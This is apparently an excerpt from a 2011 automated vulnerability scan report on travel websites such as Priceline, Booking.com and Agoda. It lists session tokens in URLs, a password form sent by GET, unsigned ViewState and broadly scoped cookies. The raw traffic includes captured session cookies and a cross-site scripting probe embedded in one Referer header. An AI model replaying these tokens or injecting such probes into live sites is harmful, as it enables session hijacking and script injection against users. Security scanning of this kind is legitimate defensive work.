10.28. http://www.priceline.com/hotels/Lang/en-us/retail/retail_bounce.asp

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.priceline.com
Path:   /hotels/Lang/en-us/retail/retail_bounce.asp

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /hotels/Lang/en-us/retail/retail_bounce.asp?session_key=711510AC721510AC2011100300374475eeb1270807&plf=pcln&KT=Y&ASID=514 HTTP/1.1
Host: www.priceline.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.priceline.com/qp.asp?productid=5&city=bos&rooms=1&checkindate=10/09/2011&checkoutdate=10/16/2011&refid=PLAWAYNETWORK&refclickid=TRIP_HOTELSEARCH
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=ID=d029e777cf494e903eef89a4c018b0f4; SETI=CCD82172E0702BC07F6EEEC20A4BA00AC57A5F491C628C0467A073D149FA2A3BB6E6E8BBB79E476AEE07A579D4DB94147A61E206E535A32806BAB0F253612BA6DBDA270CF1B13D3FC57A5F491C628C04AC84BA6362ADBF59CACA2EC5D22C91F0A30B769ACEDACD603314752CB71B92D3; vid=v2011100300373188ec0127; vsch=v2011100300373188ec0127%5F13692735; Referral=CLICKID=TRIP%5FHOTELSEARCH&SOURCEID=PL&PRODUCTID=&WEBENTRYTIME=10%2F2%2F2011+20%3A37%3A31&ID=AWAYNETWORK; Stick2=ID=0%7CA%7C10%2F2%2F2011+20%3A37; WT_FPC=id=2681d53fc9a0a3b6dd31317600550352:lv=1317602255259:ss=1317600550352; __utma=137358961.1769259490.1317600551.1317600551.1317600551.1; __utmb=137358961.3.10.1317600551; __utmc=137358961; __utmz=137358961.1317600551.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; PSessKey=711510AC721510AC2011100300374475eeb1270807

Response

HTTP/1.1 302 Object moved
Date: Mon, 03 Oct 2011 00:39:34 GMT
Server: Microsoft-IIS/6.0
Location: http://travela.priceline.com/hotel/searchHotels.do?session_key=711510AC721510AC2011100300374475eeb1270807&plf=pclh&INIT_SESSION=true&refid=PLAWAYNETWORK&refclickid=TRIP_HOTELSEARCH&searchType=CITY&cityName=bos&numberOfRooms=1&hotelBrand=&searchHotelName=&starRating=-1&checkInDate=10%2F09%2F2011&checkOutDate=10%2F16%2F2011&KMode=Y&selectedTab=0&passingValues=YES&affiliateSubID=514A
Content-Length: 568
Content-Type: text/html
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="http://travela.priceline.com/hotel/searchHotels.do?session_key=711510AC721510AC2011100300374475eeb
...[SNIP]...

10.29. http://www.priceline.com/hotels/Lang/en-us/retail/retail_bounce.asp

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.priceline.com
Path:   /hotels/Lang/en-us/retail/retail_bounce.asp

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /hotels/Lang/en-us/retail/retail_bounce.asp?session_key=711510AC721510AC2011100300374475eeb1270807&plf=pcln&KT=Y&ASID=514 HTTP/1.1
Host: www.priceline.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.priceline.com/qp.asp?productid=5&city=bos&rooms=1&checkindate=10/09/2011&checkoutdate=10/16/2011&refid=PLAWAYNETWORK&refclickid=TRIP_HOTELSEARCH
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=ID=d029e777cf494e903eef89a4c018b0f4; SETI=CCD82172E0702BC07F6EEEC20A4BA00AC57A5F491C628C0467A073D149FA2A3BB6E6E8BBB79E476AEE07A579D4DB94147A61E206E535A32806BAB0F253612BA6DBDA270CF1B13D3FC57A5F491C628C04AC84BA6362ADBF59CACA2EC5D22C91F0A30B769ACEDACD603314752CB71B92D3; vid=v2011100300373188ec0127; vsch=v2011100300373188ec0127%5F13692735; Referral=CLICKID=TRIP%5FHOTELSEARCH&SOURCEID=PL&PRODUCTID=&WEBENTRYTIME=10%2F2%2F2011+20%3A37%3A31&ID=AWAYNETWORK; Stick2=ID=0%7CA%7C10%2F2%2F2011+20%3A37; WT_FPC=id=2681d53fc9a0a3b6dd31317600550352:lv=1317602255259:ss=1317600550352; __utma=137358961.1769259490.1317600551.1317600551.1317600551.1; __utmb=137358961.3.10.1317600551; __utmc=137358961; __utmz=137358961.1317600551.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; PSessKey=711510AC721510AC2011100300374475eeb1270807

Response

HTTP/1.1 302 Object moved
Date: Mon, 03 Oct 2011 00:39:34 GMT
Server: Microsoft-IIS/6.0
Location: http://travela.priceline.com/hotel/searchHotels.do?session_key=711510AC721510AC2011100300374475eeb1270807&plf=pclh&INIT_SESSION=true&refid=PLAWAYNETWORK&refclickid=TRIP_HOTELSEARCH&searchType=CITY&cityName=bos&numberOfRooms=1&hotelBrand=&searchHotelName=&starRating=-1&checkInDate=10%2F09%2F2011&checkOutDate=10%2F16%2F2011&KMode=Y&selectedTab=0&passingValues=YES&affiliateSubID=514A
Content-Length: 568
Content-Type: text/html
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="http://travela.priceline.com/hotel/searchHotels.do?session_key=711510AC721510AC2011100300374475eeb1270807&amp;plf=pclh&amp;INIT_SESSION=true&amp;refid=PLAWAYNETWORK&amp;refclickid=TRIP_HOTELSEARCH&amp;searchType=CITY&amp;cityName=bos&amp;numberOfRooms=1&amp;hotelBrand=&amp;searchHotelName=&amp;starRating=-1&amp;checkInDate=10%2F09%2F2011&amp;checkOutDate=10%2F16%2F2011&amp;KMode=Y&amp;selectedTab=0&amp;passingValues=YES&amp;affiliateSubID=514A">here</a>
...[SNIP]...

10.30. http://www.priceline.com/hotels/lang/en-us/itinerary.asp

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.priceline.com
Path:   /hotels/lang/en-us/itinerary.asp

Issue detail

The response contains the following links that appear to contain session tokens:

Request

POST /hotels/lang/en-us/itinerary.asp?session_key=721510AC6F1410AC2011100300373191ec11270735&plf=pcln&RefID=PLAWAYNETWORK&RefClickID=TRIP_HOTELSEARCH HTTP/1.1
Host: www.priceline.com
Proxy-Connection: keep-alive
Content-Length: 345
Cache-Control: max-age=0
Origin: http://www.priceline.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.priceline.com/qp.asp?productid=5&city=bos&rooms=1&checkindate=10/09/2011&checkoutdate=10/16/2011&refid=PLAWAYNETWORK&refclickid=TRIP_HOTELSEARCH
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=ID=d029e777cf494e903eef89a4c018b0f4; SETI=CCD82172E0702BC07F6EEEC20A4BA00AC57A5F491C628C0467A073D149FA2A3BB6E6E8BBB79E476AEE07A579D4DB94147A61E206E535A32806BAB0F253612BA6DBDA270CF1B13D3FC57A5F491C628C04AC84BA6362ADBF59CACA2EC5D22C91F0A30B769ACEDACD603314752CB71B92D3; vid=v2011100300373188ec0127; vsch=v2011100300373188ec0127%5F13692735; PSessKey=721510AC6F1410AC2011100300373191ec11270735; Referral=CLICKID=TRIP%5FHOTELSEARCH&SOURCEID=PL&PRODUCTID=&WEBENTRYTIME=10%2F2%2F2011+20%3A37%3A31&ID=AWAYNETWORK; Stick2=ID=0%7CA%7C10%2F2%2F2011+20%3A37; WT_FPC=id=2681d53fc9a0a3b6dd31317600550352:lv=1317602255259:ss=1317600550352; __utma=137358961.1769259490.1317600551.1317600551.1317600551.1; __utmb=137358961.3.10.1317600551; __utmc=137358961; __utmz=137358961.1317600551.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf

OFFER%2FHOTELS%2F%40SEARCH_CITY=bos&OFFER%2FHOTELS%2F%40ROOM_COUNT=1&OFFER%2FHOTELS%2F%40ZONEID=&checkInDate=10%2F09%2F2011&CkInMonth=10&CkInDay=09&CkInYear=2011&checkOutDate=10%2F16%2F2011&CkOutMonth
...[SNIP]...

Response

HTTP/1.1 302 Object moved
Date: Mon, 03 Oct 2011 00:39:09 GMT
Server: Microsoft-IIS/6.0
Location: http://www.priceline.com/hotels/Lang/en-us/retail/retail_bounce.asp?session_key=711510AC721510AC20111003003909435251213033&plf=pcln&KT=Y&ASID=514
Content-Length: 278
Content-Type: text/html
Set-Cookie: PSessKey=711510AC721510AC20111003003909435251213033; domain=.priceline.com; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="http://www.priceline.com/hotels/Lang/en-us/retail/retail_bounce.asp?session_key=711510AC721510AC20111003003909435251213033&amp;plf=pcln&amp;KT=Y&amp;ASID=514">here</a>
...[SNIP]...

10.31. http://www.priceline.com/hotels/lang/en-us/itinerary.asp

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.priceline.com
Path:   /hotels/lang/en-us/itinerary.asp

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

POST /hotels/lang/en-us/itinerary.asp?session_key=721510AC6F1410AC2011100300373191ec11270735&plf=pcln&RefID=PLAWAYNETWORK&RefClickID=TRIP_HOTELSEARCH HTTP/1.1
Host: www.priceline.com
Proxy-Connection: keep-alive
Content-Length: 345
Cache-Control: max-age=0
Origin: http://www.priceline.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.priceline.com/qp.asp?productid=5&city=bos&rooms=1&checkindate=10/09/2011&checkoutdate=10/16/2011&refid=PLAWAYNETWORK&refclickid=TRIP_HOTELSEARCH
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=ID=d029e777cf494e903eef89a4c018b0f4; SETI=CCD82172E0702BC07F6EEEC20A4BA00AC57A5F491C628C0467A073D149FA2A3BB6E6E8BBB79E476AEE07A579D4DB94147A61E206E535A32806BAB0F253612BA6DBDA270CF1B13D3FC57A5F491C628C04AC84BA6362ADBF59CACA2EC5D22C91F0A30B769ACEDACD603314752CB71B92D3; vid=v2011100300373188ec0127; vsch=v2011100300373188ec0127%5F13692735; PSessKey=721510AC6F1410AC2011100300373191ec11270735; Referral=CLICKID=TRIP%5FHOTELSEARCH&SOURCEID=PL&PRODUCTID=&WEBENTRYTIME=10%2F2%2F2011+20%3A37%3A31&ID=AWAYNETWORK; Stick2=ID=0%7CA%7C10%2F2%2F2011+20%3A37; WT_FPC=id=2681d53fc9a0a3b6dd31317600550352:lv=1317602255259:ss=1317600550352; __utma=137358961.1769259490.1317600551.1317600551.1317600551.1; __utmb=137358961.3.10.1317600551; __utmc=137358961; __utmz=137358961.1317600551.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf

OFFER%2FHOTELS%2F%40SEARCH_CITY=bos&OFFER%2FHOTELS%2F%40ROOM_COUNT=1&OFFER%2FHOTELS%2F%40ZONEID=&checkInDate=10%2F09%2F2011&CkInMonth=10&CkInDay=09&CkInYear=2011&checkOutDate=10%2F16%2F2011&CkOutMonth
...[SNIP]...

Response

HTTP/1.1 302 Object moved
Date: Mon, 03 Oct 2011 00:39:09 GMT
Server: Microsoft-IIS/6.0
Location: http://www.priceline.com/hotels/Lang/en-us/retail/retail_bounce.asp?session_key=711510AC721510AC20111003003909435251213033&plf=pcln&KT=Y&ASID=514
Content-Length: 278
Content-Type: text/html
Set-Cookie: PSessKey=711510AC721510AC20111003003909435251213033; domain=.priceline.com; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="http://www.priceline.com/hotels/Lang/en-us/retail/retail_bounce.asp?session_key=711510AC721510AC20
...[SNIP]...

11. Password field submitted using GET method

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.booking.com
Path:   /index.en-us.html

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method: The form contains the following password fields:

Issue background

The application uses the GET method to submit passwords, which are transmitted within the query string of the requested URL. Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing passwords into the URL increases the risk that they will be captured by an attacker.

Issue remediation

All forms submitting passwords should use the POST method. To achieve this, you should specify the method attribute of the FORM tag as method="POST". It may also be necessary to modify the corresponding server-side form handler to ensure that submitted passwords are properly retrieved from the message body, rather than the URL.

Request

GET /index.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101 HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.booking.com/hotel57'%3balert(document.location)//f/us/copley-square.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;checkin=2011-10-04;checkout=2011-10-07;srfid=d7dea8120903ba76c86df3f7d5812996X1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YbKxbV%2FMJ74miFZb2Um8KgC%2Bh2rlNFJUOjhhIgDQiMlPWhvbR49z9NRCDXfmSFpQembJKACe%2BJULD0r7fdmKnWzXr6Q37gpPtlW%2B6Ycux8%2BQPqDGsS1KPc9u0j692wwry%2B1siL5lr7hR9RhSAx8eI5I5k7yEH5VzxQ664kWGsWIUlKeHSweLMihfk6DPyMYhl866qu17PfAa6RO7hkvCmVs2v%2BaHqg7PJzGQbn7fwikGZMVbIAz4LrPjzYz6RGzlbxPK5%2F6ncWhf61P8AYKmRsuHJABk5Lxudx1AECQ0vDe%2B5%2F1VK1DpRN%2FD3xPq17PxcY9moJWiAb%2BjDEsnffG8T15GZqbMnfilArnMwyxxOT479XlQbNZXA5wZsuxCJNcZhMvajEXssRbYOUmix6AuHsUneEzF62bP002BL%2BgHy8NmOxhlKYaZlXZminydIqX%2Fu%2FBy9TbfbjXbd6r03fOvrqSW1QZ5jOepBwaJyVDLVWgjbd7NGZGnNsrR8ymzJg6wSt%2BGBUXZRUrcXlY6XVXUb8p7iRLBqAwcZN69gzv7DlytCjEgIc8%2F1Pep0%2Bm1h%2BeZlaydw4HC8erBX0MQS0wB%2BXiV0wXshT55Dj0GZBEX9npRlDKVH1zcH5tfl%2BmWNqGH5XrB8at9vS%2BFPgBOKqzPuPTEEm8M58LZw0SljaZgLLizNagYMqS2INu%2FxnbGaVC%2ByaJm99%2BSM7Is7WKkS82lDPlkm2julAIA%2Bq8cNhWIfpowac5T4r5u8Fn6f47z4hzIRARVjqBajBoVpoaNDPINwfkzD4VfF56AGT0g5nl8Q7zNch34tNcMpk1%2BpxM9%2BeaPaq8rTMHiSOsqbFRFOpXlvDxoUc439HccepEUKuW5qaj1VtdMlnVkiFiM%2Bv%2FwpfCePqzf0HGDSWdKf4NdncvuGc4CXQI%2BcT1om0pVGjGqsomGmH5HTip5D56Qw4RbL1v%2BcB6vVJ8%2F%2BKKQpUqdlMXTFa1kXsfq1zqNHmx93uxn4vcRnr2nx4M%2Fa2unp0CpnQQtAdh8E%2FREJ8eW%2FMdmAsrtsIFg0YBu5y4jzrewC%2FkgM9lOWRIg7XukObhLsYxWaE2laG%2B2TpO4jVJz35UlsuhFr2M5p%2Bd57HfkCUX%2BZTXu6qnSpFmzXSfgDeuWJWTFzXoBQEohozrytDzbYjlfb%2B7JSaJ1vXhcy15EpDbJEyN7kfvx%2Bi4F9skpy0c1fc5ZZIjkPBPbd9qFhsWxA8UMVqn8PV68J38KAFmJ4JSDNSSjUndN8EgnrUkMPtAr2yReY1C1LjICryrAap9gVMLJKV9n8njP4Nsr%2BXpDV7BLYvLgTFOQ; __utma=1.1339354214.1317600621.1317603252.1317603725.3; __utmb=1.5.9.1317605413177; __utmc=1; __utmz=1.1317603725.3.3.utmcsr=tripad|utmccn=(not%20set)|utmcmd=SPPC|utmctr=hotel-59554|utmcct=text-cr; BJS=-; ramala=12.6519598960876

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:30:58 GMT
Server: Apache
Set-Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YV721dMcSbN41dGlG0KbBsKqdlryV2YMpyAycJPmGespKu%2FhvMH%2Bcml0MfZ8A3ADJmd0MPnRSrNRZRaXhMOvd2kmD1ykHQKaTCcYuaNBykbfcIHf7qGipxec1ymPHBj%2BSPuY3eJ2t1gAhSxFt7C%2BXKIWT1%2BF%2BNseMD8tm%2BoBpHmY%2B4G8epSAxtgFe1r%2FZ%2BxYDjuD2NpPo6C9jBeKN0S3X8qZLiL35HDHITVkM52TvKbaTeW4KxHTDD5RUcIueLKTZg0BO87d9%2Fxc9VCRdnjKNerj1geW2DZOmfjBGz9GYJMoCdarKmUVAsnR0iXlxgtoIXiGK6B0iPx0xH19c3KJP%2Fkub96OFhR33o7ZjjY237VztvCv20%2BHP3eevg5x8InAGExRh%2BYDvVr7pMcvgIG%2Biwukv%2Bq9IdotNCKKOLZ6LNaa3MP5RZd4JuSJ7vTwJ1p7wUjgsfT2YbU1xQeOK0dMNLi3JElFSD4F%2FYFW9YiNE7m9wsE1lVwpCtME41Qchw1Vrngk0a1c2nsxR9AK8%2BdGLTXQZIqaX4yxY6u6rDwYTTn9YDLkgj%2FqhC0cwPd3mWQk2TRp7JjCV6QejLIM9ULw05UxEAjMpxK3vPohrcX2dsf%2BWDK0fV7zagYQT75cLLxuOgvaBbz90dOfvgIsFEMSW9sv9%2BxL10EqJVw1joKPhcjSWnExfbMdsPwCTbHfJjKvai8%2BeQjZXTUdImR26CVh6mh94DKTT2raUiRxZ5uqelBYtyq9RuiJ%2BpbscXeCEQqzzhaWnh6i3tUV4WbqEugtNMgyRESMS1MnuJG7QiKCzkPwKX%2B%2Fxf1UUgjxu%2BwiKHptFD3Gm0ZKfZYcSGS6wybLkXfBw3muIaLdnewJ%2BpktRlg%2BNM6RkvzSSrP0W%2FiY7C8yQ7YJO5ly%2FdA4yb2eNrI2eaSdHozvCCCVTHBJhW4MqhZ%2B3nHMhXrSa%2F3pP9dmdho1W%2Br6D5fEJmtuYd6%2BmW2CPKlXnvJE%2BWu%2F3HIBZaTQze6WQZBzPFo1MFb9EaE14fMMVy7QmARBtbNqT5hU3b4gi2RCrc57nrocp6I6V786mK%2FXMTbtzGwruafLcYHsfPiR8bJphP3zeq9fFHeR2PL4RIPEK4qhSIOgu5t%2BRQaCb37oFN1O%2BThaGtxLG5Zx%2BrhnjoX%2BIh6Ugpw0W8qzEURgDkAxaWeVhqSVEFhcUByxRvPZl5ooVeMvflIYStfkx4fo1p7XLfUSIwc1ZSQBCt1Xi7L34Tl7mLvy1OzzWRkNtG2J0U21ZAtpTsV0%2B5WXRMAZHIo8j3YhZPe6Sy58aUCfgQu%2FHDYDHxKLTRS%2F3hToUO2lIaqTSxxDxjZiwuWpTRETXxHgk6R0Zm5X3xC2768YFIzCnCh%2FFYvpX4Ydn8FeRl9mompZttcmHllz%2FCH2TKO3pA%3D%3D; path=/; domain=.booking.com; expires=Fri, 20-Dec-2019 01:30:59 GMT; HTTPOnly
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 201048
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country_setvars.inc -->



...[SNIP]...
<input type="hidden" name="sid" value="9fcdaabed9e2bb46b60772539b0ca101" />

<form id="subscriber_account_active" action="https://secure.booking.com/login.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;">
<input type="hidden" name="op" value="register">
...[SNIP]...
</label>
<input style="float: right;" type="password" name="password" value=""></li>
...[SNIP]...
</label>
<input style="float: right;" type="password" name="password_confirm" value=""></li>
...[SNIP]...

12. ASP.NET ViewState without MAC enabled

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.agoda.com
Path:   /

Issue description

The ViewState is a mechanism built into the ASP.NET platform for persisting elements of the user interface and other data across successive requests. The data to be persisted is serialised by the server and transmitted via a hidden form field. When it is POSTed back to the server, the ViewState parameter is deserialised and the data is retrieved.

By default, the serialised value is signed by the server to prevent tampering by the user; however, this behaviour can be disabled by setting the Page.EnableViewStateMac property to false. If this is done, then an attacker can modify the contents of the ViewState and cause arbitrary data to be deserialised and processed by the server. If the ViewState contains any items that are critical to the server's processing of the request, then this may result in a security exposure.

You should review the contents of the deserialised ViewState to determine whether it contains any critical items that can be manipulated to attack the application.

Issue remediation

There is no good reason to disable the default ASP.NET behaviour in which the ViewState is signed to prevent tampering. To ensure that this occurs, you should set the Page.EnableViewStateMac property to true on any pages where the ViewState is not currently signed.

Request

GET / HTTP/1.1
Host: www.agoda.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.trip.com/hotels.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=usyvurhj5s34qtup52oltx1d; agoda.version.02=CookieId=7523af68-b979-4a5c-9566-6cdf92488e9a&AllocId=7e8ed96e55a1afa44758a9a3548685a805d33aa9e52f062bd12dd4c14f0443858201818dc947029deb77f5ece1dfdd8b53ce5b4bcaab65f1374e65c5c00ce5341e3516961f3b6a770dff9a5728226b6f70b9ec62c57523af68b979a5c5666cdf92488e9a&TItems=2$1444075$10-03-2011 07:37$10-02-2012 07:37$; agodalbny=www.agoda.com_cluster_31

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate, proxy-revalidate
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Date: Mon, 03 Oct 2011 00:38:30 GMT
Content-Length: 221222


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"xmlns:og="http://opengraphproto
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="...[SNIP]..." />
...[SNIP]...

13. Cookie scoped to parent domain
There are 179 instances of this issue:

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.


13.1. http://api.twitter.com/1/statuses/user_timeline.json

Summary

Severity:   Low
Confidence:   Firm
Host:   http://api.twitter.com
Path:   /1/statuses/user_timeline.json

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /1/statuses/user_timeline.json?screen_name=goal_intl&callback=TWTR.Widget.receiveCallback_1&include_rts=true&count=5&clientsource=TWITTERINC_WIDGET&1317599944868=cachebust HTTP/1.1
Host: api.twitter.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.goal.com/en/news/9/england/2011/10/01/2691360/anderson-confident-manchester-united-will-keep-unbeaten-run
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=v1%3A131479755238577138; __qca=P0-1403506059-1316475190092; k=10.35.22.124.1317385056818946; external_referer=ZLhHHTiegr93cD84PZkyRqf9EoFxAAGiT%2F0jMHbZrcFB29W7H3tcaIGESzWrcIvCHb8W50GSwrcQe2RZEXpR1wwB6U6khrBbnKvI13rVW%2F4DTuA%2BtaolAW5CfRZjXVgRMm5ohI%2BpGWoFvfn8EIm9nTPeiHgUxMO9S3a5uaQjgagOnqp96%2FFzs27Y%2Fe%2B3b3sx%7C0; __utma=43838368.1721518288.1314976448.1317595795.1317595795.7; __utmb=43838368.2.10.1317595795; __utmz=43838368.1317595795.6.6.utmcsr=status.twitter.com|utmccn=(referral)|utmcmd=referral|utmcct=/; ab_sess_remember_me_on_signup_83=1

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:00:30 GMT
Status: 200 OK
X-Transaction: 61f46ab37e88dc8e
X-RateLimit-Limit: 150
ETag: "2f4cb01229388f621f6d7f8c92c02774"-gzip
X-Frame-Options: SAMEORIGIN
Last-Modified: Mon, 03 Oct 2011 00:00:30 GMT
X-RateLimit-Remaining: 148
X-Runtime: 0.02507
X-Transaction-Mask: a6183ffa5f8ca943ff1b53b5644ef114349dfad6
Content-Type: application/javascript; charset=utf-8
Pragma: no-cache
X-RateLimit-Class: api
X-Content-Type-Options: nosniff
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: ed9090d8f4e1233909edcfb3fdcc1cf37ea299f5
X-RateLimit-Reset: 1317603558
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCCHWE8cyASIKZmxhc2hJQzonQWN0aW9uQ29u%250AdHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoHaWQiJTc2%250AYzZjNDk3OTg0ZmYwYTg0NjYyZDg4MzE0MjFhMzBj--3cd45407d96b1a446d7041edbb7385311f792aa8; domain=.twitter.com; path=/; HttpOnly
Vary: Accept-Encoding
Content-Length: 10038
Server: tfe

TWTR.Widget.receiveCallback_1([{"geo":null,"favorited":false,"coordinates":null,"id_str":"120645100576579584","retweet_count":5,"in_reply_to_screen_name":null,"in_reply_to_user_id":null,"possibly_sens
...[SNIP]...

13.2. http://as00.estara.com/fs/rules.php

Summary

Severity:   Low
Confidence:   Firm
Host:   http://as00.estara.com
Path:   /fs/rules.php

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /fs/rules.php?accountid=200106297609&title=Priceline.com%20-%20hotel%2C%20hotel%20reservation%2C%20cheap%20hotel%2C%20las%20vegas%20hotel%2C%20boston%20hotel%2C%20hotel%20deal%2C%20ne&referrer=http%3A%2F%2Ftravela.priceline.com%2Fhotel%2FsearchHotels.do%3Fsession_key%3D711510AC721510AC2011100300374475eeb1270807%26plf%3Dpclh%26INIT_SESSION%3Dtrue%26refid%3DPLAWAYNETWORK%26refclickid%3DTRIP_HOTELSEARCH%26searchType%3DCITY%26cityName%3Dbos%26numberOfRooms%3D1%26hotelBrand%3D%26searchHotelName%3D%26starRating%3D-1%26checkInDate%3D10%252F09%252F2011%26checkOutDate%3D10%252F16%252F2011%26KMode%3DY%26selectedTab%3D0%26passingValues%3DYES%26affiliateSubID%3D514A&w=1920&h=1200&d=16&platform=Win32&ua=Mozilla%2F5.0%20(Windows%20NT%206.1%3B%20WOW64)%20AppleWebKit%2F535.1%20(KHTML%2C%20like%20Gecko)%20Chrome%2F14.0.835.187%20Safari%2F535.1&cs=ISO-8859-1&estara_fsguid=